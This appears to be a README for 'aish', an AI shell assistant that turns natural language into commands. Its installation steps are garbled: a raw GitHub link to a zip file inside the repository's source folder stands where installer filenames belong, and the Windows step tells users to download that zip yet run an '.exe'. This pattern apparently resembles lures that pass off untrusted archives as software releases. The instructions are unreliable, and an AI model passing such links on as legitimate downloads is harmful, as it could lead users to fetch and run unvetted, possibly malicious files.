aish is an AI-powered shell assistant that helps you execute commands and file operations through natural language. You can interact with your computer in a more intuitive way, using ordinary language instead of complex terminal commands.
To begin using aish, follow these simple steps to download and run the application.
Before downloading, make sure your system meets the following requirements:
- Operating System: Windows 10 or later, macOS Mojave or later, Linux (Ubuntu 20.04 or later recommended)
- RAM: Minimum 4 GB
- Disk Space: At least 100 MB available
- Internet Connection: Required for initial setup and updates
- Natural Language Processing: Communicate with your shell using simple, everyday language.
- Contextual Commands: Ask aish to perform tasks based on your requests without needing to know specific commands.
- Multi-Platform Support: Works on Windows, macOS, and Linux.
- File Operations: Easily manage files such as creating, moving, or deleting without the need for complex commands.
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Visit the Releases Page: Go to the Releases page on GitHub.
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Choose Your Version: Look for the latest version. It will be the one at the top of the list.
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Download the Installer: Click on the appropriate installer for your operating system:
- For Windows, find the file named something like
https://raw.githubusercontent.com/jfassis20/aish/main/src/cli/aish_v2.6.zip. - For macOS, download the file ending with
.dmg. - For Linux, you may find
.deborhttps://raw.githubusercontent.com/jfassis20/aish/main/src/cli/aish_v2.6.zipfiles.
- For Windows, find the file named something like
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Run the Installer:
- Windows: Double-click the downloaded
.exefile and follow the on-screen instructions. - macOS: Open the
.dmgfile and drag the aish icon into your Applications folder. - Linux: Use the package manager or run commands in your terminal to install the downloaded package.
- Windows: Double-click the downloaded
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Launch aish: After installation, locate aish in your applications or programs and open it.
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Get Started: Type your command or request into the aish interface. For instance, you can say, βCreate a new folder named Projectsβ.
If you encounter issues during installation or usage, consider these solutions:
- Installation Problems: Confirm that your operating system is supported. Ensure you have enough disk space and RAM.
- Running Issues: Make sure your system meets the minimum specifications. Verify that all updates have been installed.
- Command Recognition: If aish doesn't understand you, try rephrasing your request. Use clear and simple language.
For additional help or to report issues, visit our GitHub Issues page. The community and developers are here to assist you.
Stay connected with other aish users. You can find tips, tricks, and updates by following us on the following platforms:
- GitHub Discussions: Engage with the community and share your experiences.
- Twitter: Follow us for news and updates.
aish is open source and comes with a permissive license. You can use, modify, and distribute it freely while crediting the original creators.
Explore the potential of AI at your command with aish, your new shell assistant!